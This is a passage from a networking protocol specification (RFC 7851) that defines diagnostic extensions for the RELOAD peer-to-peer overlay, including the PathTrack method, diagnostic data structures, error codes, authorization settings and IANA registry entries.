It is important to note that the mechanisms described in this document do not guarantee that the information collected is in fact related to the previous failures. However, using the information from previous traversed nodes, the user (or management system) may be able to infer the problem. Symmetric routing can be achieved by using the Via List [RFC6940] (or an alternate DHT routing algorithm), but the response path is not guaranteed to be the same.
4.2. "Ping-like" Behavior: Extending Ping
To provide "ping-like" behavior, the RELOAD Ping method is extended to collect diagnostic data along the path. The request message is forwarded by the intermediate peers along the path and then terminated by the responsible peer. After optional local diagnostics, the responsible peer returns a response message. If an error is found when routing, an error response is sent to the initiator node by the intermediate peer.
The message flow of a Ping message (with diagnostic extensions) is as follows:
```
Peer A           Peer B           Peer C           Peer D
  |  (1) PingReq   |  (2) PingReq   |  (3) PingReq   |
  | -------------> | -------------> | -------------> |
  |  (6) PingAns   |  (5) PingAns   |  (4) PingAns   |
  | <------------- | <------------- | <------------- |
```
Figure 1: Ping Diagnostic Message Flow
4.2.1. RELOAD Request Extension: Ping
To extend the Ping request for use in diagnostics, a new extension of RELOAD is defined. The structure for a MessageExtension in RELOAD is defined as:
```c
struct {
MessageExtensionType type;
Boolean critical;
opaque extension_contents<0..2^32-1>;
} MessageExtension;
```
For the Ping request extension, we define a new MessageExtensionType, extension 0x2, named "Diagnostic_Ping", as specified in Table 4. The extension contents consist of a DiagnosticsRequest structure, defined in Section 5.1. This extension MAY be used in new requests of the Ping method and MUST NOT be included in requests using any other method.
This extension is not critical. If a peer does not support the extension, it will simply ignore the diagnostic portion of the message and treat the message as a normal Ping. Senders MUST accept a response that lacks diagnostic information and SHOULD NOT resend the message expecting a reply. Receivers that receive a method other than Ping including this extension MUST ignore the extension.
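For illustration, a non-normative sketch of serializing the Diagnostic_Ping extension, assuming the usual RELOAD presentation-language widths (uint16 MessageExtensionType, uint8 Boolean, 32-bit length-prefixed opaque contents); the `encode_message_extension` helper is hypothetical, and the DiagnosticsRequest body is left empty here:

```python
import struct

DIAGNOSTIC_PING = 0x2  # MessageExtensionType from Table 4

def encode_message_extension(ext_type, critical, contents):
    """uint16 type, uint8 boolean, then 32-bit length-prefixed opaque contents."""
    return (struct.pack("!HB", ext_type, 1 if critical else 0)
            + struct.pack("!I", len(contents)) + contents)

# Non-critical Diagnostic_Ping extension with an empty (placeholder) body.
wire = encode_message_extension(DIAGNOSTIC_PING, False, b"")
```

In a real implementation the opaque contents would carry a serialized DiagnosticsRequest (Section 5.1) rather than an empty string.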
4.3. "Traceroute-like" Behavior: The PathTrack Method
We define a simple PathTrack method for retrieving diagnostic information iteratively.
The operation of this request is shown below in Figure 2. The initiator node A asks its neighbor B for the next-hop peer to the destination ID, and B returns a message to the initiator with the next-hop peer C information, along with optional diagnostic information about B. The initiator node A then asks the next-hop peer C (via direct response routing [RFC7263] or symmetric routing) to return next-hop peer D information and the diagnostic information of C. Unless a failure prevents the message from being forwarded, this step is repeated until the request reaches the responsible peer D for the destination ID and retrieves the diagnostic information of peer D.
The message flow of a PathTrack message (with diagnostic extensions) is as follows:
```
Peer A              Peer B           Peer C           Peer D
  |  (1) PathTrackReq  |                |                |
  | -----------------> |                |                |
  |  (2) PathTrackAns  |                |                |
  | <----------------- |                |                |
  |  (3) PathTrackReq                   |                |
  | ----------------------------------> |                |
  |  (4) PathTrackAns                   |                |
  | <---------------------------------- |                |
  |  (5) PathTrackReq                                    |
  | ---------------------------------------------------> |
  |  (6) PathTrackAns                                    |
  | <--------------------------------------------------- |
```
Figure 2: PathTrack Diagnostic Message Flow
There have been proposals that RouteQuery and a series of Fetch requests can be used to replace the PathTrack mechanism; however, in the presence of high rates of churn, such an operation would not, strictly speaking, provide identical results, as the path may change between RouteQuery and Fetch operations. While obviously the path could change between steps of PathTrack as well, with a single message rather than two messages for query and fetch, less inconsistency is likely, and thus the use of a single message is preferred.
Given that in a typical diagnostic scenario the peer sending the PathTrack request desires to obtain information about the current path to the destination, in the event that successive calls to PathTrack return different paths, the results should be discarded and the request resent, ensuring that the second request traverses the appropriate path.
4.3.1. New RELOAD Request: PathTrack
This document defines a new RELOAD method, PathTrack, to retrieve the diagnostic information from the intermediate peers along the routing path. At each step of the PathTrack request, the responsible peer responds to the initiator node with requested status information. Status information can include a peer’s congestion state, processing power, available bandwidth, the number of entries in its neighbor table, uptime, identity, network address information, and next hop peer information.
A PathTrack request specifies which diagnostic information is requested using a DiagnosticsRequest data structure, which is defined and discussed in detail in Section 5.1. Base information is requested by setting the appropriate flags in the data structure in the request. If all flags are clear (no bits are set), then the PathTrack request is only used for requesting the next hop information. In this case, the iterative mode of PathTrack is degraded to a RouteQuery method that is only used for checking the liveness of the peers along the routing path. The PathTrack request can be routed using direct response routing or other routing methods chosen by the initiator node.
A response to a successful PathTrackReq is a PathTrackAns message. The PathTrackAns contains general diagnostic information in the payload, returned using a DiagnosticsResponse data structure. This data structure is defined and discussed in detail in Section 5.2. The information returned is determined by the flags set in the corresponding request.
4.3.1.1. PathTrack Request
The structure of the PathTrack request is as follows:
```c
struct{
Destination destination;
DiagnosticsRequest request;
}PathTrackReq;
```
The fields of the PathTrackReq are as follows:
destination: The destination that the initiator node is interested in. This may be any valid destination object, including a NodeID, opaque ids, or ResourceID. Note that, for debugging purposes, the initiator should use the same destination ID that was in use when the failure happened.
request: A DiagnosticsRequest, as discussed in Section 5.1.
4.3.1.2. PathTrack Response
The structure of the PathTrack response is as follows:
```c
struct{
Destination next_hop;
DiagnosticsResponse response;
}PathTrackAns;
```
The fields of the PathTrackAns are as follows:
next_hop: The information of the next hop node from the responding intermediate peer to the destination. If the responding peer is the responsible peer for the destination ID, then the next_hop node ID equals the responding node ID. After receiving a PathTrackAns in which the next_hop node ID equals the responding node ID, the initiator MUST stop the iterative process.
response: A DiagnosticsResponse, as discussed in Section 5.2.
4.4. Error Code Extensions
This document extends the error response method defined in the RELOAD specification to support error cases resulting from diagnostic queries. When an error is encountered in RELOAD, the Message Code 0xffff is returned. The ErrorResponse structure includes an error code. We define new error codes to report possible error conditions detected while performing diagnostics:
<table>
<thead>
<tr>
<th>Code Value</th>
<th>Error Code Name</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x15</td>
<td>Error_Underlay_Destination_Unreachable</td>
</tr>
<tr>
<td>0x16</td>
<td>Error_Underlay_Time_Exceeded</td>
</tr>
<tr>
<td>0x17</td>
<td>Error_Message_Expired</td>
</tr>
<tr>
<td>0x18</td>
<td>Error_Upstream_Misrouting</td>
</tr>
<tr>
<td>0x19</td>
<td>Error_Loop_Detected</td>
</tr>
<tr>
<td>0x1a</td>
<td>Error_TTL_Hops_Exceeded</td>
</tr>
</tbody>
</table>
The error code is returned by the upstream node of the failed node. The upstream node uses a normal Ping to detect the failure type and returns it to the initiator node. This helps the user (initiator node) understand where the failure happened and what kind of error occurred, since the failure is likely to happen at the same location and for the same reason for both normal messages and diagnostics messages.
As defined in RELOAD, additional information may be stored (in an implementation-specific way) in the optional error_info byte string. While the specifics are obviously left to the implementation, as an example, in the case of 0x15, the error_field could be used to provide additional information as to why the underlay destination is unreachable (net unreachable, host unreachable, fragmentation needed, etc.).
5. Diagnostic Data Structures
Both the extended Ping method and PathTrack method use the following common diagnostics data structures to collect data. Two common structures are defined: DiagnosticsRequest for requesting data and DiagnosticsResponse for returning the information.
5.1. DiagnosticsRequest Data Structure
The DiagnosticsRequest data structure is used to request diagnostic information and has the following form:
```c
enum { (2^16-1) } DiagnosticKindId;
struct{
DiagnosticKindId kind;
opaque diagnostic_extension_contents<0..2^32-1>;
}DiagnosticExtension;
struct{
uint64 expiration;
uint64 timestamp_initiated;
uint64 dMFlags;
uint32 ext_length;
DiagnosticExtension diagnostic_extensions_list<0..2^32-1>;
}DiagnosticsRequest;
```
The fields in the DiagnosticsRequest are as follows:
**expiration:** The time when the request will expire, represented as the number of milliseconds elapsed since midnight Jan 1, 1970 UTC (not counting leap seconds). This will have the same values for seconds as standard UNIX time or POSIX time. More information can be found at "Unix time" in Wikipedia [UnixTime]. This value MUST be between 1 and 600 seconds in the future. This value is used to prevent replay attacks.
**timestamp_initiated:** The time when the diagnostics request was initiated, represented as the number of milliseconds elapsed since midnight Jan 1, 1970 UTC (not counting leap seconds). This will have the same values for seconds as standard UNIX time or POSIX time.
dMFlags: A mandatory field that is an unsigned 64-bit integer indicating which base diagnostic information the request initiator node is interested in. The initiator sets different bits to retrieve different kinds of diagnostic information. If dMFlags is set to zero, then no base diagnostic information is conveyed in the PathTrack response. If dMFlags is set to all "1"s, then all base diagnostic information values are requested. A request may set any number of the flags to request the corresponding diagnostic information.
Note this memo specifies the initial set of flags; the flags can be extended. The dMflags indicate general diagnostic information. The mapping between the bits in the dMFlags and the diagnostic Kind ID presented is as described in Section 9.1.
ext_length: The length of the extended diagnostic request information in bytes. If the value is greater than or equal to 1, then some extended diagnostic information is being requested on the assumption this information will be included in the response if the recipient understands the extended request and is willing to provide it. The specific diagnostic information requested is defined in the diagnostic_extensions_list below. A value of zero indicates no extended diagnostic information is being requested. The value of ext_length MUST NOT be negative. Note that it is not the length of the entire DiagnosticsRequest data structure, but of the data making up the diagnostic_extensions_list.
diagnostic_extensions_list: Consists of one or more DiagnosticExtension structures (see below) documenting additional diagnostic information being requested. Each DiagnosticExtension consists of the following fields:
kind: A numerical code indicating the type of extension diagnostic information (see Section 9.2). Note that kinds 0xf000 - 0xfffe are reserved for overlay specific diagnostics and may be used without IANA registration for local diagnostic information. Kinds from 0x0000 to 0x003f MUST NOT be indicated in the diagnostic_extensions_list in the message request, as they may be represented using the dMFlags in a much simpler (and more space efficient) way.
diagnostic_extension_contents: The opaque data containing the request for this particular extension. This data is extension dependent.
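A non-normative sketch of packing the fixed fields of a DiagnosticsRequest (timestamps in milliseconds since the UNIX epoch, network byte order); the wire encoding of the extensions list is simplified to a pre-serialized byte string, and the helper name is an assumption:

```python
import struct
import time

def encode_diagnostics_request(dm_flags, extensions=b"", ttl_ms=60_000):
    """Pack expiration, timestamp_initiated, dMFlags, and ext_length
    (Section 5.1); expiration must fall 1-600 seconds in the future."""
    now = int(time.time() * 1000)          # milliseconds since the UNIX epoch
    header = struct.pack("!QQQI", now + ttl_ms, now, dm_flags, len(extensions))
    return header + extensions

# Request only the base information selected by bit 1 of dMFlags.
req = encode_diagnostics_request(0b10)
```

The fixed header is 28 bytes (three uint64 fields plus one uint32); any DiagnosticExtension structures would be serialized separately and appended.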
5.2. DiagnosticsResponse Data Structure
The DiagnosticsResponse data structure is used to return the diagnostic information and has the following form:
```c
enum { (2^16-1) } DiagnosticKindId;
struct{
DiagnosticKindId kind;
opaque diagnostic_info_contents<0..2^16-1>;
}DiagnosticInfo;
struct{
uint64 expiration;
uint64 timestamp_initiated;
uint64 timestamp_received;
uint8 hop_counter;
uint32 ext_length;
DiagnosticInfo diagnostic_info_list<0..2^32-1>;
}DiagnosticsResponse;
```
The fields in the DiagnosticsResponse are as follows:
expiration: The time when the response will expire, represented as the number of milliseconds elapsed since midnight Jan 1, 1970 UTC (not counting leap seconds). This will have the same values for seconds as standard UNIX time or POSIX time. This value MUST be between 1 and 600 seconds in the future.
timestamp_initiated: This value is copied from the diagnostics request message. The benefit of including this value in the response message is that the initiator node does not have to maintain state.
timestamp_received: The time when the diagnostic request was received represented as the number of milliseconds elapsed since midnight Jan 1, 1970 UTC (not counting leap seconds). This will have the same values for seconds as standard UNIX time or POSIX time.
hop_counter: This field only appears in diagnostic responses. It MUST be exactly copied from the TTL field of the forwarding header in the received request. This information is sent back to the request initiator, allowing it to compute the number of hops that the message traversed in the overlay.
ext_length: The length of the returned DiagnosticInfo information in bytes. If the value is greater than or equal to 1, then some extended diagnostic information (as specified in the DiagnosticsRequest) was available and is being returned. In that case, this value indicates the length of the returned information. A value of zero indicates no extended diagnostic information is included either because none was requested or the request could not be accommodated. The value of ext_length MUST NOT be negative. Note that it is not the length of the entire DiagnosticsRequest data structure but of the data making up the diagnostic_info_list.
diagnostic_info_list: Consists of one or more DiagnosticInfo structures containing the requested diagnostic_info_contents. The fields in the DiagnosticInfo structure are as follows:
kind: A numeric code indicating the type of information being returned. For base data requested using the dMFlags, this code corresponds to the dMFlag set and is described in Section 5.1. For diagnostic extensions, this code will be identical to the value of the DiagnosticKindId set in the "kind" field of the DiagnosticExtension of the request. See Section 9.2.
diagnostic_info_contents: Data containing the value for the diagnostic information being reported. Various kinds of diagnostic information can be retrieved. Please refer to Section 5.3 for details of the diagnostic Kind ID for the base diagnostic information that may be reported.
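Two quantities the initiator can derive from a DiagnosticsResponse, sketched below: the overlay hop count (assuming, as in RELOAD forwarding, that the TTL is decremented once per overlay hop) and the one-way request delay, which is only meaningful to the extent the two clocks are synchronized:

```python
def overlay_hops(initial_ttl, hop_counter):
    """Hops traversed = TTL the initiator sent minus the echoed hop_counter."""
    return initial_ttl - hop_counter

def request_delay_ms(timestamp_initiated, timestamp_received):
    """One-way request delay in milliseconds (clock-synchronization dependent)."""
    return timestamp_received - timestamp_initiated
```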
5.3. dMFlags and Diagnostic Kind ID Types
The dMFlags field described above is a 64-bit field that allows initiator nodes to identify up to 62 items of base information to request in a request message (the first and last flags being reserved). The dMFlags also reserves all "0"s, which means nothing is requested, and all "1"s, which means everything is requested. But at the same time, the first and last bits cannot be used for other purposes, and they MUST be set to 0 when other particular diagnostic Kind IDs are requested. When the requested base information is returned in the response, the value of the diagnostic Kind ID will correspond to the numeric field marked in the dMFlags in the request. The values for the dMFlags are defined in Section 9.1 and the diagnostic Kind IDs are defined in Section 9.2. The information contained for each value is described in this section. Access to each kind of diagnostic information MUST NOT be allowed unless compliant to the rules defined in Section 7.
STATUS_INFO (8 bits): A single-value element containing an unsigned byte representing whether or not the node is in congestion status. An example usage of STATUS_INFO is for congestion-aware routing. In this scenario, each peer has to update its congestion status periodically. An intermediate peer in the Distributed Hash Table (DHT) network will choose its next hop according to both the DHT routing algorithm and the status information. This is done to avoid increasing load on congested peers. The rightmost 4 bits are used and other bits MUST be cleared to "0"s for future use.
There are 16 levels of congestion status, with 0x00 representing zero load and 0x0f representing congestion. This document does not provide a specific method for measuring congestion and leaves this decision to each overlay implementation. One possible option for an overlay implementation would be to take the node’s CPU/memory/bandwidth usage percentage over the past 600 seconds and normalize the highest value to the range from 0x00 to 0x0f. An overlay implementation can also decide not to use all 16 values from 0x00 to 0x0f. A future document may define an objective measure or specific algorithm for this.
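One possible (non-normative) mapping from a resource-usage percentage to the 16 STATUS_INFO levels, along the lines the paragraph above suggests; the spec deliberately leaves the metric to each overlay implementation:

```python
def congestion_level(usage_percent):
    """Map a 0-100% usage figure onto STATUS_INFO levels
    0x00 (zero load) .. 0x0f (congested)."""
    usage_percent = min(max(usage_percent, 0.0), 100.0)  # clamp to valid range
    return min(int(usage_percent / 100 * 16), 0x0f)
```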
ROUTING_TABLE_SIZE (32 bits): A single-value element containing an unsigned 32-bit integer representing the number of peers in the peer’s routing table. The administrator of the overlay may be interested in statistics of this value for reasons such as routing efficiency.
PROCESS_POWER (64 bits): A single-value element containing an unsigned 64-bit integer specifying the processing power of the node with MIPS as the unit. Fractional values are rounded up.
UPSTREAM_BANDWIDTH (64 bits): A single-value element containing an unsigned 64-bit integer specifying the upstream network bandwidth (provisioned or maximum, not available) of the node with units of kbit/s. Fractional values are rounded up. For multihomed hosts, this should be the link used to send the response.
DOWNSTREAM_BANDWIDTH (64 bits): A single-value element containing an unsigned 64-bit integer specifying the downstream network bandwidth (provisioned or maximum, not available) of the node with kbit/s as the unit. Fractional values are rounded up. For multihomed hosts, this should be the link the request was received from.
SOFTWARE_VERSION: A single-value element containing a US-ASCII string that identifies the manufacturer, model, operating system information, and the version of the software. Given that there are a very large number of peers in some networks, and no peer is likely to know all other peers’ software, this information may be very useful in determining whether the cause of certain groups of misbehaving peers is related to specific software versions. While the format is peer defined, a suggested format is as follows: "ApplicationProductToken (Platform; OS-or-CPU) VendorProductToken (VendorComment)", for example, "MyReloadApp/1.0 (Unix; Linux x86_64) libreload-java/0.7.0 (Stonyfish Inc.)". The string is a C-style string and MUST be terminated by "\0". "\0" MUST NOT be included in the string itself, to prevent confusion with the delimiter.
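A sketch of producing the suggested SOFTWARE_VERSION string, including the required NUL terminator and the rule that NUL must not appear inside the string; the helper name and the argument split are assumptions:

```python
def software_version_string(app, platform, os_or_cpu, vendor, comment):
    """Build "App (Platform; OS-or-CPU) Vendor (Comment)" as a NUL-terminated
    US-ASCII byte string, per the suggested format in Section 5.3."""
    s = f"{app} ({platform}; {os_or_cpu}) {vendor} ({comment})"
    if "\0" in s:
        raise ValueError("NUL must not appear inside SOFTWARE_VERSION")
    return s.encode("ascii") + b"\0"

sv = software_version_string("MyReloadApp/1.0", "Unix", "Linux x86_64",
                             "libreload-java/0.7.0", "Stonyfish Inc.")
```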
MACHINE_UPTIME (64 bits): A single-value element containing an unsigned 64-bit integer specifying the time the node’s underlying system has been up (in seconds).
APP_UPTIME (64 bits): A single-value element containing an unsigned 64-bit integer specifying the time the P2P application has been up (in seconds).
MEMORY_FOOTPRINT (64 bits): A single-value element containing an unsigned 64-bit integer representing the memory footprint of the peer program in kilobytes (1024 bytes). Fractional values are rounded up.
DATASIZE_STORED (64 bits): An unsigned 64-bit integer representing the number of bytes of data being stored by this node.
INSTANCES_STORED: An array element containing the number of instances of each kind stored. The array is indexed by Kind-ID. Each entry is an unsigned 64-bit integer.
MESSAGES_SENT_RCVD: An array element containing the number of messages sent and received. The array is indexed by method code. Each entry in the array is a pair of unsigned 64-bit integers (packed end to end) representing sent and received.
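As an illustrative sketch (these helper names are not defined by the RFC), one MESSAGES_SENT_RCVD entry can be packed as two unsigned 64-bit integers laid end to end, assuming big-endian (network) byte order:

```c
#include <stdint.h>

/* Write v into p[0..7], most significant byte first. */
void put_u64(uint8_t *p, uint64_t v) {
    for (int i = 0; i < 8; i++)
        p[i] = (uint8_t)(v >> (8 * (7 - i)));
}

/* Read an unsigned 64-bit integer back out of p[0..7]. */
uint64_t get_u64(const uint8_t *p) {
    uint64_t v = 0;
    for (int i = 0; i < 8; i++)
        v = (v << 8) | p[i];
    return v;
}

/* One array entry: the sent and rcvd counters packed end to end. */
void pack_sent_rcvd(uint8_t buf[16], uint64_t sent, uint64_t rcvd) {
    put_u64(buf, sent);      /* sent counter first */
    put_u64(buf + 8, rcvd);  /* rcvd counter immediately after */
}
```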
EWMA_BYTES_SENT (32 bits): A single-value element containing an unsigned 32-bit integer representing an exponential weighted average of bytes sent per second by this peer:
\[ \text{sent} = \alpha \times \text{sent\_present} + (1 - \alpha) \times \text{sent\_last} \]
where sent_present represents the bytes sent per second since the last calculation and sent_last represents the last calculation of
bytes sent per second. A suitable value for alpha is 0.8 (or another value as determined by the implementation). This value is calculated every five seconds (or another time period as determined by the implementation). The value for the very first time period should simply be the average of bytes sent in that time period.
**EWMA_BYTES_RCVD (32 bits):** A single-value element containing an unsigned 32-bit integer representing an exponential weighted average of bytes received per second by this peer:
\[
\text{rcvd} = \alpha \times \text{rcvd\_present} + (1 - \alpha) \times \text{rcvd\_last}
\]
where rcvd\_present represents the bytes received per second since the last calculation and rcvd\_last represents the last calculation of bytes received per second. A suitable value for alpha is 0.8 (or another value as determined by the implementation). This value is calculated every five seconds (or another time period as determined by the implementation). The value for the very first time period should simply be the average of bytes received in that time period.
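The update rule above can be sketched in C; this is a minimal illustration using the suggested alpha of 0.8, and the function name is not from the RFC:

```c
#include <stdint.h>

/* One EWMA step: `present` is the rate measured over the last
 * period, `last` is the previous EWMA value.
 * rate = 0.8 * present + 0.2 * last */
uint32_t ewma_update(uint32_t present, uint32_t last) {
    const double alpha = 0.8;
    return (uint32_t)(alpha * present + (1.0 - alpha) * last);
}
```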
**UNDERLAY_HOP (8 bits):** Indicates the IP-layer hops from the intermediate peer that receives the diagnostics message to the next-hop peer for this message. (Note: RELOAD does not require the intermediate peers to look into the message body, so here we use PathTrack to gather underlay hops for diagnostic purposes.)
**BATTERY_STATUS (8 bits):** The leftmost bit is used to indicate whether this peer is using a battery or not. If this bit is clear (set to "0"), then the peer is using a battery for power. The other 7 bits are to be determined by specific applications.
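The BATTERY_STATUS test reduces to a single mask, sketched below (the function name is illustrative):

```c
#include <stdint.h>

/* The leftmost bit of the octet (mask 0x80) clear means the peer
 * is running on battery power; set means it is not. The low 7
 * bits are application defined. */
int on_battery_power(uint8_t battery_status) {
    return (battery_status & 0x80) == 0;
}
```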
6. Message Processing
6.1. Message Creation and Transmission
When constructing either a Ping message with diagnostic extensions or a PathTrack message, the sender first creates and populates a DiagnosticsRequest data structure. The timestamp_initiated field is set to the current time, and the expiration field is constructed based on this time. The sender includes the dMFlags field in the structure, setting any number (including all) of the flags to request particular diagnostic information. The sender MAY leave all the bits unset, thereby requesting no particular diagnostic information.
The sender MAY also include diagnostic extensions in the DiagnosticsRequest data structure to request additional information.
If the sender includes any extensions, it MUST calculate the length of these extensions and set the ext_length field to this value. If no extensions are included, the sender MUST set ext_length to zero.
The format of the DiagnosticRequest data structure and its fields MUST follow the restrictions defined in Section 5.1.
When constructing a Ping message with diagnostic extensions, the sender MUST create a MessageExtension structure as defined in RELOAD [RFC6940], setting the value of type to 0x2 and the value of critical to FALSE. The value of extension_contents MUST be a DiagnosticsRequest structure as defined above. The message MAY be directed to a particular NodeID or ResourceID but MUST NOT be sent to the broadcast NodeID.
When constructing a PathTrack message, the sender MUST set the message_code for the RELOAD MessageContents structure to path_track_req 0x27. The request field of the PathTrackReq MUST be set to the DiagnosticsRequest data structure defined above. The destination field MUST be set to the desired destination, which MAY be either a NodeID or ResourceID but SHOULD NOT be the broadcast NodeID.
When a request arrives at a peer, if the peer’s responsible ID space does not cover the destination ID of the request, then the peer MUST continue processing this request according to the overlay-specified routing mode from the RELOAD protocol.
In a P2P overlay, error responses to a message can be generated by either an intermediate peer or the responsible peer. When a request is received at a peer, the peer may detect connectivity failures or malfunctioning peers through the predefined rules of the overlay network, e.g., by analyzing the Via List or underlay error messages. In this case, the intermediate peer returns an error response to the initiator node, reporting any malfunctioning-node information available in the error message payload. All error responses generated MUST contain the appropriate error code.
Each intermediate peer receiving a Ping message with extensions (and that understands the extension) or receiving a PathTrack request / response MUST check the expiration value (Unix time format) to determine if the message is expired. If the message expired, the intermediate peer MUST generate a response with error code 0x17 "Error_Message_Expired", return the response to the initiator node, and discard the message.
The intermediate peer MUST return an error response with the error code 0x15 "Error_Underlay_Destination_Unreachable" when it receives an ICMP message with "Destination Unreachable" information after forwarding the received request to the destination peer.
The intermediate peer MUST return an error response with the error code 0x16 "Error_Underlay_Time_Exceeded" when it receives an ICMP message with "Time Exceeded" information after forwarding the received request.
The peer MUST return an error response with error code 0x18 "Error_Upstream_Misrouting" when it finds its upstream peer disobeys the routing rules defined in the overlay. The immediate upstream peer information MUST also be conveyed to the initiator node.
The peer MUST return an error response with error code 0x19 "Error_Loop_Detected" when it finds a loop through the analysis of the Via List.
The peer MUST return an error response with error code 0x1a "Error_TTL_Hops_Exceeded" when it finds that the TTL field value is no more than 0 when forwarding.
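Two of the checks above can be sketched as follows; the function names are illustrative, not from the RFC, and treating a message whose expiration equals the current time as expired is an assumption:

```c
#include <stdint.h>

/* Times are Unix timestamps in seconds. A message at or past its
 * expiration triggers 0x17 "Error_Message_Expired". */
int message_expired(uint64_t expiration, uint64_t now) {
    return now >= expiration;
}

/* A TTL of zero or less at forwarding time triggers
 * 0x1a "Error_TTL_Hops_Exceeded". */
int ttl_hops_exceeded(int ttl) {
    return ttl <= 0;
}
```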
6.3. Message Response Creation
When a diagnostic request message arrives at a peer that is responsible for the destination ID specified in the forwarding header, and assuming the peer understands the extension (in the case of Ping) or the new request type PathTrack, it MUST follow the specifications defined in RELOAD to form the response header and perform the following operations:
- When constructing a PathTrack response, the sender MUST set the message_code for the RELOAD MessageContents structure to path_track_ans 0x28.
- The receiver MUST check the expiration value (Unix time format) in the DiagnosticsRequest to determine if the message is expired. If the message is expired, the peer MUST generate a response with the error code 0x17 "Error_Message_Expired", return the response to the initiator node, and discard the message.
- If the message is not expired, the receiver MUST construct a DiagnosticsResponse structure as follows: 1) the TTL value from the forwarding header is copied to the hop_counter field of the DiagnosticsResponse structure (note that the default value for TTL at the beginning represents 100 hops unless the overlay configuration has overridden the value), and 2) the receiver
generates a Unix time format timestamp for the current time of day and places it in the timestamp_received field and constructs a new expiration time and places it in the expiration field of the DiagnosticsResponse.
- The destination peer MUST check if the initiator node has the authority to request specific types of diagnostic information, and if appropriate, append the diagnostic information requested in the dMFlags and diagnostic_extensions (if any) using the diagnostic_info_list field to the DiagnosticsResponse structure. If any information is returned, the receiver MUST calculate the length of the response and set ext_length appropriately. If no diagnostic information is returned, ext_length MUST be set to zero.
- The format of the DiagnosticResponse data structure and its fields MUST follow the restrictions defined in Section 5.2.
- In the event of an error, an error response containing the error code followed by the description (if they exist) MUST be created and sent to the sender. If the initiator node asks for diagnostic information that they are not authorized to query, the receiving peer MUST return an error response with the error code 2 "Error_Forbidden".
6.4. Interpreting Results
The initiator node, as well as the responding peer, may compute the overlay One-Way-Delay time from the values in the timestamp_received and timestamp_initiated fields. However, for a single-hop measurement, the traditional measurement methods (IP-layer ping) MUST be used instead of the overlay-layer diagnostics methods.
The P2P overlay network using the diagnostics methods specified in this document MUST enforce time synchronization with a central time server. The Network Time Protocol [RFC5905] can usually maintain time to within tens of milliseconds over the public Internet and can achieve better than one millisecond accuracy in local area networks under ideal conditions. However, this document does not specify the choice for time resolution and synchronization, leaving it to the implementation.
The initiator node receiving the Ping response may check the hop_counter field and compute the overlay hops to the destination peer for the statistics of connectivity quality from the perspective of overlay hops.
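The one-way-delay computation described in this section amounts to a single subtraction; the sketch below assumes both clocks are NTP-synchronized, as the text requires, and the function name is illustrative:

```c
#include <stdint.h>

/* Overlay one-way delay: the responder's receive timestamp minus
 * the initiator's send timestamp (same units on both sides). */
int64_t overlay_one_way_delay(uint64_t timestamp_initiated,
                              uint64_t timestamp_received) {
    return (int64_t)(timestamp_received - timestamp_initiated);
}
```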
7. Authorization through Overlay Configuration
Different levels of access control can be defined for different users/nodes. For example, diagnostic information A can be accessed by nodes 1 and 2, while diagnostic information B can only be accessed by node 2.
The overlay configuration file MUST contain the following XML elements for authorizing a node to access the relative diagnostic Kinds.
diagnostic-kind: This element has the attribute "kind", a hexadecimal number indicating the diagnostic Kind ID. This attribute takes the same values as defined in Section 9.2. The element contains at least one subelement "access-node".
access-node: This element contains one hexadecimal number indicating a NodeID, and the node with this NodeID is allowed to access the diagnostic "kind" under the same diagnostic-kind element.
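As an illustration, a configuration fragment granting two nodes access to one diagnostic Kind might look like this (the Kind ID is STATUS_INFO from Section 9.2; the NodeID values are made up):

```xml
<diagnostic-kind kind="0x0001">
  <access-node>0123456789abcdef</access-node>
  <access-node>fedcba9876543210</access-node>
</diagnostic-kind>
```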
8. Security Considerations
The authorization for diagnostic information must be designed with care to prevent it from becoming a method to retrieve information for attacks. It should also be noted that attackers can use diagnostics to analyze overlay information in order to attack certain key peers. For example, diagnostic information might be used to fingerprint a peer, causing the peer to lose its anonymity; anonymity may be very important in some P2P overlay networks, and defenses against such fingerprinting are probably very hard. As such, networks where anonymity is of very high importance may find implementation of diagnostics problematic or even undesirable, despite the many advantages it offers. As this document is a RELOAD extension, it follows RELOAD message header and routing specifications. The common security considerations described in the base document [RFC6940] are also applicable to this document. Overlays may define their own requirements on who can collect/share diagnostic information.
9. IANA Considerations
9.1. Diagnostics Flag
IANA has created a "RELOAD Diagnostics Flag" registry under protocol RELOAD. Entries in this registry are 1-bit flags contained in a 64-bit integer dMFlags denoting diagnostic information to be retrieved as described in Section 4.3.1. New entries SHALL be defined via Standards Action as per [RFC5226]. The initial contents of this registry are:
<table>
<thead>
<tr>
<th>Diagnostic Information</th>
<th>Diagnostic Flag in dMFlags</th>
<th>Reference</th>
</tr>
</thead>
<tbody>
<tr>
<td>Reserved All 0s value</td>
<td>0x 0000 0000 0000 0000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>Reserved First Bit</td>
<td>0x 0000 0000 0000 0001</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>STATUS_INFO</td>
<td>0x 0000 0000 0000 0002</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>ROUTING_TABLE_SIZE</td>
<td>0x 0000 0000 0000 0004</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>PROCESS_POWER</td>
<td>0x 0000 0000 0000 0008</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>UPSTREAM_BANDWIDTH</td>
<td>0x 0000 0000 0000 0010</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>DOWNSTREAM_BANDWIDTH</td>
<td>0x 0000 0000 0000 0020</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>SOFTWARE_VERSION</td>
<td>0x 0000 0000 0000 0040</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MACHINE_UPTIME</td>
<td>0x 0000 0000 0000 0080</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>APP_UPTIME</td>
<td>0x 0000 0000 0000 0100</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MEMORY_FOOTPRINT</td>
<td>0x 0000 0000 0000 0200</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>DATASIZE_STORED</td>
<td>0x 0000 0000 0000 0400</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>INSTANCES_STORED</td>
<td>0x 0000 0000 0000 0800</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>MESSAGES_SENT_RCVD</td>
<td>0x 0000 0000 0000 1000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>EWMA_BYTES_SENT</td>
<td>0x 0000 0000 0000 2000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>EWMA_BYTES_RCVD</td>
<td>0x 0000 0000 0000 4000</td>
<td>RFC 7851</td>
</tr>
<tr>
<td>UNDERLAY_HOP</td>
